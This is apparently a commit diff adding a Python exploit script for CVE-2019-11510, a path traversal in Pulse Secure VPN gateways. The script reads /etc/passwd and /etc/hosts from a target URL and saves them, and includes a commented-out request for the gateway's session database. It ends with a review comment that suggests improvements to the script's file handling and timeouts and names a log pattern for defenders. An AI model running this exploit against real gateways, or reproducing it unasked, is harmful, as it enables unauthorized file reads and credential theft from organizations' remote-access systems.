add CVE-2019-11510
@@ -0,0 +1,93 @@
|
||||
import requests
|
||||
import requests.packages.urllib3
|
||||
requests.packages.urllib3.disable_warnings()
|
||||
import os
|
||||
import sys
|
||||
|
||||
|
||||
banner = '''
|
||||
_______ ________ ___ ___ __ ___ __ __ _____ __ ___
|
||||
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ /_ | ____/_ |/ _ \
|
||||
| | \ \ / /| |__ ______ ) | | | || | (_) |______| || | |__ | | | | |
|
||||
| | \ \/ / | __|______/ /| | | || |\__, |______| || |___ \ | | | | |
|
||||
| |____ \ / | |____ / /_| |_| || | / / | || |___) || | |_| |
|
||||
\_____| \/ |______| |____|\___/ |_| /_/ |_||_|____/ |_|\___/
|
||||
|
||||
Any file read and admin Rce
|
||||
|
||||
python By jas502n
|
||||
'''
|
||||
print banner
|
||||
|
||||
def etc_passwd(url):
|
||||
file_read = ['/etc/passwd', '/etc/hosts']
|
||||
if url[-1] == '/':
|
||||
vuln_url_1 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
|
||||
vuln_url_2 = url + 'dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
|
||||
output = url[8:-1]
|
||||
|
||||
mdb_url = url + "dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
|
||||
else:
|
||||
vuln_url_1 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[0]
|
||||
vuln_url_2 = url + '/dana-na/../dana/html5acc/guacamole/../../../../../../..%s?/dana/html5acc/guacamole/' % file_read[1]
|
||||
output = url[8:]
|
||||
|
||||
mdb_url = url + "/dana-na/../dana/html5acc/guacamole/../../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/"
|
||||
|
||||
r1 = requests.get(vuln_url_1, verify=False)
|
||||
r2 = requests.get(vuln_url_2, verify=False)
|
||||
# r3 = requests.get(mdb_url, verify=False)
|
||||
|
||||
# print r3.status_code
|
||||
# print r3.content
|
||||
|
||||
# file_mdb = open("data_runtime_mtmp_lmdb_dataa_data.mdb",'ab')
|
||||
# file_mdb.write(r3.content)
|
||||
# file.close
|
||||
|
||||
|
||||
if r1.status_code == 200 and 'root:x' in r1.text:
|
||||
print
|
||||
print url + " ---------------> Vulnerable"
|
||||
print "Writing all files to output file " + output
|
||||
print "\nExtracting " + file_read[0]
|
||||
print
|
||||
print vuln_url_1
|
||||
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
||||
print r1.text
|
||||
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
|
||||
|
||||
# os.system('mkdir %s' % output)
|
||||
|
||||
f = open("c.txt","wb")
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
f.write(file_read[0] + '\n\n' + r1.text+'\n')
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
|
||||
if r2.status_code == 200 and 'localhost' in r2.text:
|
||||
print "Extracting " + file_read[1]
|
||||
print
|
||||
print vuln_url_2
|
||||
print "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
|
||||
print r2.text
|
||||
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"
|
||||
f.write(file_read[1] + '\n\n' + r2.text+'\n')
|
||||
f.write('\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n')
|
||||
f.close()
|
||||
|
||||
|
||||
|
||||
else:
|
||||
print url + " ---------------> Not Vulnerable"
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
url = sys.argv[1]
|
||||
etc_passwd(url)
|
||||
|
||||
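Review bot: The success branch prints `"Writing all files to output file " + output`, but the data is written to the fixed name `c.txt` opened with `"wb"`, so the message is wrong and each run truncates the previous run's evidence; `output` (taken as `url[8:]`, which assumes an `https://` prefix) is never used as a path. The retrieved `/etc/passwd` and `/etc/hosts` contents are sensitive assessment artifacts that land in the working directory with default permissions; I would write them through `with open(output + ".txt", "wb") as f:` and tighten the file mode afterwards. Indentation is lost in this rendering, so I cannot confirm whether `f.close()` is reached when the second check fails; the `with` form removes that question. Both `requests.get(..., verify=False)` calls also lack a `timeout=`, so an unresponsive host blocks the run indefinitely. On the defensive side, a header comment should record that requests combining the `dana-na/../dana/html5acc/guacamole/` traversal with the trailing `?/dana/html5acc/guacamole/` are the pattern to search for in gateway access logs.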